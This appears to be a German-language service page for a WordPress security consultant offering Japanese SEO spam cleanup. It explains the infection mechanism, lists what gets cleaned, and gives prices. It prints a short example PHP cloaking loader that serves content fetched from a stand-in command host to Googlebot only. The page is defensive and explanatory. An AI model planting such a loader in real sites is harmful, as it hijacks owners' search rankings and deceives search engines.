threatover Patrik Grobshäuser

Japanese SEO spam · cloaked · cleaned

Japanese SEO spam removal.

Manuelle Entfernung der japanischen SEO-Spam-Injektion. Bereinigung von Dateien und Datenbank. Sitemap-Purge. Eintrittsvektor identifiziert. Anträge auf erneute Prüfung eingereicht. Pauschal $279.

Mechanism

Was 'japanischer SEO-Spam' technisch ist.

Ein Angreifer platziert einen PHP-Loader auf deiner Seite (meist in wp-content/plugins/ oder wp-content/uploads/). Der Loader generiert tausende synthetische Seiten mit japanischen Keywords und japanischen Produkttiteln. Er schreibt deine Sitemap um, sodass Googlebot sie findet. Echte Besucher sehen den Spam nie — der Loader prüft den User-Agent und liefert Menschen deine normale Seite aus.

Bis du es bemerkst, hat Google hunderte oder tausende japanischsprachige URLs auf deiner Domain indexiert. Search Console mailt eine Sicherheitswarnung. Rankings fallen. Das Label 'Gehackt: Content-Injektion' erscheint in der Search Console.

Typical cloaking loader
01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

What I remove

Jeden Ort, an dem sich diese Infektion versteckt.

  • File loaders

    Verschleiertes PHP in Plugins, mu-plugins, Themes und Uploads. Wir lesen die Diffs, nicht die Dateinamen.

  • Database

    In wp_posts eingeschleuster Spam-Inhalt, schädliche autoloaded wp_options-Einträge, verdächtige wp_usermeta.

  • Seitenübersicht

    Generierte synthetische Sitemap-Einträge entfernt; saubere Sitemap neu erzeugt und erneut bei der Search Console eingereicht.

  • Htaccess

    .htaccess- und nginx-Rewrite-Regeln, die Googlebot oder bestimmte Pfade umleiten — zurückgesetzt.

  • Admin users

    Vom Loader angelegte schlafende Administrator-Konten — entfernt. Alle verbleibenden Admin-Secrets rotiert.

  • Entry vector

    Verwundbares Plugin oder gestohlene Zugangsdaten identifiziert und geschlossen. Ohne diesen Schritt wird dasselbe Loch innerhalb von Wochen wieder genutzt.

Preise

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten

Monitoring

$29 / mo

per site, cancel any time

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

E-Mail [email protected] or use the contact form.